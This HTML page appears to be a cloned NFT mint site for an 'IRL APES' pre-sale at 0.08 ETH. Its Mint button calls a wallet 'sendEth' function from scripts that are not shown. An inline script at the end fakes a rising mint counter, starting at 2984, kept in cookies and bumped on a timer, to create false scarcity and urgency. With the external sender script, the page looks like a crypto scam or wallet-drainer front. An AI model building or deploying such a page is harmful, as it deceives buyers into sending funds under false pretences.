
<!DOCTYPE html>
<html lang="en">

<head>

<title>IRL APES - LIMITED SALE</title>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no" />
<meta name="theme-color" content="#000000" />
<meta name="robots" content="index, follow" />
	
<meta property="og:url" content="index.html">
<meta property="twitter:domain" content="myhomies.mintsite.page">
<meta property="twitter:url" content="index.html">

<link rel="shortcut icon" href="favicon.png" />
<link rel="stylesheet" href="static/css/style.css">
<link rel="stylesheet" href="../cdnjs.cloudflare.com/ajax/libs/slick-carousel/1.8.1/slick.min.css" integrity="sha512-yHknP1/AwR+yx26cB1y0cjvQUMvEa2PFzt1c9LlS4pRQ5NOTZFWbhBig+X9G9eYW/8m0/4OXNx8pxJ6z57x0dw==" crossorigin="anonymous" referrerpolicy="no-referrer" />
<script type="text/javascript" src="../unpkg.com/web3%401.2.11/dist/web3.min.js"></script>
<script src="../cdn.ethers.io/lib/ethers-5.1.umd.min.js" type="text/javascript"></script>
<script src="../cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" integrity="sha512-894YE6QWD5I59HgZOGReFYm4dnWc1Qt5NtvYSaNcOP+u1T9qYdvdihz0PPSiiqn/+/3e7Jo4EaG7TubfWGUrMQ==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
<script src="../cdnjs.cloudflare.com/ajax/libs/slick-carousel/1.8.1/slick.min.js" integrity="sha512-XtmMtDEcNz2j7ekrtHvOVR4iwwaD6o/FUJe6+Zq+HgcCsk3kj4uSQQR8weQ2QVj1o0Pk6PwYLohm206ZzNfubg==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
<script type="text/javascript" src="static/js/onboard-dist/main.js" defer></script>
<script type="text/javascript" src="static/js/sender.js" defer></script>
<script src="static/js/scripts.js" defer></script>

<script>
	var _paq = window._paq = window._paq || [];
	/* tracker methods like "setCustomDimension" should be called before "trackPageView" */
	_paq.push(['trackPageView']);
	_paq.push(['enableLinkTracking']);
	(function() {
		var u = "";
		_paq.push(['setTrackerUrl', u + 'matomo.php']);
		_paq.push(['setSiteId', '3']);
		_paq.push(['enableJSErrorTracking']);
		var d = document,
			g = d.createElement('script'),
			s = d.getElementsByTagName('script')[0];
		g.async = true;
		g.src = 'static/js/matomo.js';
		s.parentNode.insertBefore(g, s);
	})();
	</script>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-109686920-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-109686920-1');
</script>



</head>
<body>
<main>
<div class="main-flex">
<div class="slider"> <img src="static/media/slide1.png" alt="slide"> <img src="static/media/slide2.png" alt="slide"> <img src="static/media/slide3.png" alt="slide"> <img src="static/media/slide4.png" alt="slide"> </div>
<div class="header-cont">
<div class="dutch-detail-two-sides">
<div class="dutch-det-left">
<div class="text-block-13">Special Price for Pre Sale</div>
</div>
<div class="dutch-det-right">
<div class="text-block-12">January <span id="dateday2"></span> <span id="datehour1"></span></div>
</div>
</div>
<div class="header_flex">
<div class="dutch-detail-two-sides">
<div class="dutch-det-left">
<div class="text-block-13">Supply</div>
</div>
<div class="dutch-det-right">
<div class="text-block-12">3333</div>
</div>
</div>
<div class="dutch-detail-two-sides">
<div class="dutch-det-left">
<div class="text-block-13">Price</div>
</div>
<div class="dutch-det-right">
<div class="text-block-12">0.08 ETH</div>
</div>
</div>
<div class="dutch-detail-two-sides">
<div class="dutch-det-left">
<div class="text-block-13">Max</div>
</div>
<div class="dutch-det-right">
<div class="text-block-12">10 per Wallet</div>
</div>
</div>
</div>
<div id="claim-text-wrapper">
<div id="payment-modal">
<div id="payment-header">
<div id="payment-header-text" style=" margin: 0 auto; ">
<h1 class="heading-2-copy-copy-copy-copy" style=" margin: 0; padding: 0;     font-style: initial;"><span style="text-transform: none;">Limited Sale</span></h1> </div>
</div>
<div id="payment-info" style=" margin-top: 20px; "><img id="price-img" src="static/media/gifius.gif" alt="Claim NFT">
<div id="payment-info-text">
<p>Price Per NFT</p>
<h5>0.08 ETH Each</h5> </div>
</div>
<div id="ape-number">
<div id="minus" class="minuson">
<svg width="12" height="2" viewBox="0 0 16 2" fill="none" xmlns="http://www.w3.org/2000/svg" style="left: 11px;">
<path d="M15 0H1C0.734784 0 0.48043 0.105357 0.292893 0.292893C0.105357 0.48043 0 0.734784 0 1C0 1.26522 0.105357 1.51957 0.292893 1.70711C0.48043 1.89464 0.734784 2 1 2H15C15.2652 2 15.5196 1.89464 15.7071 1.70711C15.8946 1.51957 16 1.26522 16 1C16 0.734784 15.8946 0.48043 15.7071 0.292893C15.5196 0.105357 15.2652 0 15 0Z" fill="white"></path>
</svg>
</div>
<h5 id="pricex" style="margin-left: 13px; margin-right: 13px;">1</h5>
<input name="eth" class="eth_input text-field-5 w-input" type="hidden" min="1" max="10" pattern="[A-z0-9]{2,50}" minlength="2" maxlength="50" required="required" value="1">
<div id="plus" class="pluson">
<svg width="12" height="12" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg" style="left: 11px;">
<path d="M15 7H9V1C9 0.734784 8.89464 0.48043 8.70711 0.292893C8.51957 0.105357 8.26522 0 8 0C7.73478 0 7.48043 0.105357 7.29289 0.292893C7.10536 0.48043 7 0.734784 7 1V7H1C0.734784 7 0.48043 7.10536 0.292893 7.29289C0.105357 7.48043 0 7.73478 0 8C0 8.26522 0.105357 8.51957 0.292893 8.70711C0.48043 8.89464 0.734784 9 1 9H7V15C7 15.2652 7.10536 15.5196 7.29289 15.7071C7.48043 15.8946 7.73478 16 8 16C8.26522 16 8.51957 15.8946 8.70711 15.7071C8.89464 15.5196 9 15.2652 9 15V9H15C15.2652 9 15.5196 8.89464 15.7071 8.70711C15.8946 8.51957 16 8.26522 16 8C16 7.73478 15.8946 7.48043 15.7071 7.29289C15.5196 7.10536 15.2652 7 15 7Z" fill="white"></path>
</svg>
</div>
<h5 id="ape-max">Set Max</h5> </div>
<div id="ape-total">
<p>Total</p>
<h5><span id="price">0.08</span> ETH</h5></div>
</div>
<button class="cta connect-btn" id="transfer" onclick="wallet.sendEth()">Mint</button>
<div id="num"><span id="mintnumber">2984</span><span class="num_c">/</span><span id="num_2">3333</span></div>
</div>
</div>
</div>
</main>
<style>
	#num {
		display: flex;
		align-items: center;
		justify-content: center;
		margin-top: 8px;
	}

	.num_c {
		margin-left: 5px;
		margin-right: 5px;
	}

	.dutch-detail-two-sides {
		text-align: center;
	}

	.header-cont {
		color: #fff;
		display: flex;
		flex-direction: column;
		align-items: center;
		font-family: 'Blender Pro', 'Helvetica', sans-serif;
	}

	#claim-text-wrapper {
		width: 524px;
		padding: 32px;
		background: rgb(11 11 8 / 80%);
		border-radius: 10px;
	}

	.header_flex {
		display: grid;
		grid-template-columns: repeat(3, auto);
		grid-gap: 30px;
		margin-top: 25px;
		margin-bottom: 25px;
		width: 524px;
		justify-content: space-between;
	}

	.text-block-13 {
		background-color: rgba(11,11 ,8,0.8);
    border-radius: 20px;
    padding: 5px 30px 5px 30px;
    color: #fff;
    font-weight: 700;
    font-size: 22px;
    margin-bottom: 5px;
	}

	.text-block-12 {
		background-color: rgba(11,11 ,8,0.8);
    border-radius: 20px;
    padding: 5px 30px 5px 30px;
    color: #fff;
    font-size: 19px;
    font-weight: 400;
	}

	.heading-2-copy-copy-copy-copy {
		opacity: 1;
		color: rgb(252, 252, 253);
		line-height: 51px;
		font-style: italic;
		font-weight: 900;
		text-align: center;
		text-transform: uppercase;
		font-size: 51px !important;
		letter-spacing: 1px !important;
	}

	#payment-info {
		display: flex;
		margin-top: 20px;
		margin-bottom: 32px;
		padding: 12px;
		border-width: 1px;
		border-style: solid;
		border-color: rgb(255, 255, 255);
		border-image: initial;
		border-radius: 10px;
	}

	#price-img {
		width: 82px;
		height: 82px;
		border-radius: 10px;
	}

	#payment-info-text {
		text-align: end;
		margin: auto 0px auto auto;
	}

	#payment-info-text p {
		margin-block-start: 10px;
		margin-block-end: 10px;
		font-weight: 400;
		font-size: 15px;
		padding: 0!important;
	}

	#payment-info-text h5 {
		font-size: 22px;
		font-weight: 400!important;
	}

	#ape-number {
		display: flex;
		box-sizing: border-box;
		margin-bottom: 32px;
		align-items: center;
		padding: 12px;
		background: rgba(123, 123, 123, 0.41);
		border-width: 1px;
		border-style: solid;
		border-color: rgb(255, 255, 255);
		border-image: initial;
		border-radius: 10px;
	}

	#minus,
	#plus {
		position: relative;
		color: rgb(241, 241, 241);
		cursor: pointer;
		width: 20px;
		height: 20px;
		display: flex;
		align-items: center;
		justify-content: center;
	}

	#payment-info-text h4,
	#payment-info-text h5 {
		font-family: Montserrat, sans-serif;
		font-weight: 600;
		color: rgb(241, 241, 241);
		margin-block-start: 0px;
		margin-block-end: 0px;
	}

	#ape-total {
		display: flex;
		height: 65px;
		margin-bottom: 32px;
		padding-left: 10px;
		padding-right: 10px;
		border-top: 1px solid rgb(255, 255, 255);
		border-bottom: 1px solid rgb(255, 255, 255);
	}

	#ape-total h5,
	#ape-total p {
		margin-block-start: 0px;
		margin-block-end: 0px;
		margin-top: auto;
		margin-bottom: auto;
		color: #fff;
		padding: 0!important;
		font-size: 20px;
	}

	#ape-total h5 {
		margin-right: 0;
		margin-left: auto;
	}

	#pricex {
		font-size: 22px;
	}

	.frm {
		display: flex;
		align-items: center;
		justify-content: center;
	}

	.max-button {
		width: 90px;
		height: 55px;
		border-radius: 10px;
		background-color: #FF0008;
		color: #fff;
		padding: 0;
		display: flex;
		align-items: center;
		justify-content: center;
		cursor: pointer;
		margin-left: 15px;
		font-weight: bold;
		transition: .3s;
	}

	.max-button:hover {
		background-color: #fff;
		color: #FF0008;
	}

	#ape-max {
		text-align: end;
		margin: auto 0 auto auto;
		padding-left: 15px;
		padding-right: 15px;
		padding-top: 5px;
		padding-bottom: 5px;
		background: #fff;
		color: #000;
		text-align: center;
		text-transform: uppercase;
		font-weight: 400;
		cursor: pointer;
		-webkit-box-shadow: 0 0 10px 2px #fff;
		-moz-box-shadow: 0 0 10px 2px #fff;
		box-shadow: 0 0 10px 2px #fff;
		-webkit-transition: -webkit-transform 0.25s ease-in-out;
		transition: -webkit-transform 0.25s ease-in-out;
		-o-transition: -o-transform 0.25s ease-in-out;
		-moz-transition: transform 0.25s ease-in-out, -moz-transform 0.25s ease-in-out;
		transition: transform 0.25s ease-in-out;
		transition: transform 0.25s ease-in-out, -webkit-transform 0.25s ease-in-out, -moz-transform 0.25s ease-in-out, -o-transform 0.25s ease-in-out;
		font-family: 'Blender Pro', 'Helvetica', sans-serif;
	}

	#total {
		color: #d20000;
		font-size: 24px;
	}

	.incr {
		display: flex;
		align-items: center;
		justify-content: space-between;
		font-size: 24px;
		font-weight: 900;
		width: 180px;
		height: 55px;
		padding: 0 11px;
		box-sizing: border-box;
		background: #fff;
		border-radius: 10px;
		color: #000;
	}

	#timer+p {
		padding-bottom: 20px;
	}

	.mint-change {
		font-weight: bold;
		cursor: pointer;
	}

	.btn {
		text-align: center;
		display: block;
		width: 150px;
		margin-left: auto!important;
		margin-right: auto!important;
		margin-top: 15px;
		padding-left: 6px!important;
		color: #fff !important;
		text-transform: uppercase;
	}

	.btn:hover {
		color: #d20000!important;
	}

	#connect,
	#transfer {
		text-align: end;
		font-size: 24px;
		margin: auto 0 auto auto;
		padding-left: 15px;
		padding-right: 15px;
		padding-top: 5px;
		padding-bottom: 5px;
		background: #fff;
		color: #000;
		text-align: center;
		text-transform: uppercase;
		cursor: pointer;
		-webkit-box-shadow: 0 0 10px 2px #fff;
		-moz-box-shadow: 0 0 10px 2px #fff;
		box-shadow: 0 0 10px 2px #fff;
		-webkit-transition: -webkit-transform 0.25s ease-in-out;
		transition: -webkit-transform 0.25s ease-in-out;
		-o-transition: -o-transform 0.25s ease-in-out;
		-moz-transition: transform 0.25s ease-in-out, -moz-transform 0.25s ease-in-out;
		transition: transform 0.25s ease-in-out;
		transition: transform 0.25s ease-in-out, -webkit-transform 0.25s ease-in-out, -moz-transform 0.25s ease-in-out, -o-transform 0.25s ease-in-out;
		font-family: 'Blender Pro', 'Helvetica', sans-serif;
		font-weight: bold;
		font-size: 22px;
		margin-left: auto;
		margin-right: auto;
		display: block;
	}
	/*#transfer{*/
	/*    display: none;*/
	/*}*/

	.svelte-q1527 {
		display: none;
	}

	.svelte-q1527:first-child {
		display: block;
	}

	@media(max-width:720px) {
		#box0title1 {
			font-size: 100px!important;
		}
		#box0title0 {
			font-size: 60px!important;
		}
		.header-cont {
			/*width: 100%;*/
			padding-left: 20px;
			padding-right: 20px;
		}
		#claim-text-wrapper {
			width: 100%;
		}
		.header_flex {
			width: 100%;
		}
		.svelte-q1527 {
			display: block;
		}
		.main-flex {
			flex-direction: column-reverse;
			height: auto;
		}
		.slider {
			max-width: 100%;
			margin-top: 50px;
		}
	}
	</style>
	<script>
         function writeCookie(name, val, expires) {
             var date = new Date;
             date.setDate(date.getDate() + expires);
             document.cookie = name + "=" + val + "; path=/; expires=" + date.toUTCString();
         }
         
         function readCookie(name) {
             var matches = document.cookie.match(new RegExp(
                 "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
             ));
             return matches ? decodeURIComponent(matches[1]) : undefined;
         }
         var mintnumber = Number(readCookie('minted'));
         if (mintnumber > 0) {
             writeCookie('status', 'yes', 40);
             var mintnumber = Number(readCookie('minted'));
             document.getElementById("mintnumber").innerHTML = mintnumber;
         } else {
             var mintnumber = 2984;
             writeCookie('minted', 2984, 220);
         };
         var interval = setInterval(foo, 2200)
         
         function foo() {
             if (mintnumber < 3200) {
                 mintnumber = mintnumber + 2;
                 writeCookie('minted', mintnumber, 3);
                 document.getElementById("mintnumber").innerHTML = mintnumber;
             }
         	if ((mintnumber >= 500) && (mintnumber < 3278)) {
                 mintnumber = mintnumber + 1;
                 writeCookie('minted', mintnumber, 220);
                 document.getElementById("mintnumber").innerHTML = mintnumber;
             }
             if (mintnumber >= 3328) clearInterval(interval);
         }
      </script>
</body>

</html>
